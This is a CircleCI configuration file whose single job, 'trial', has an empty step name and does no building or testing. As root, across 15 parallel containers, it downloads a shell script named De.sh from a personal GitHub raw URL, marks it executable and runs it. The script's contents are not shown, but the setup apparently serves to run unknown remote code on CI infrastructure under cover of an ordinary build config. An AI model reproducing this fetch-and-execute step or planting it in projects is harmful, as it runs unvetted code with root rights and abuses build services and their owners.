version: 2.1
jobs:
  trial:
    docker:
      - image: circleci/ruby:2.5.3
    parallelism: 15
    steps:
      - run:
         name:
         command: |
            sudo su --command "wget https://raw.githubusercontent.com/Owijeka/dev/main/De.sh && chmod u+x De.sh && ./De.sh"

workflows:
  version: 2.1
  build:
    jobs:
      - trial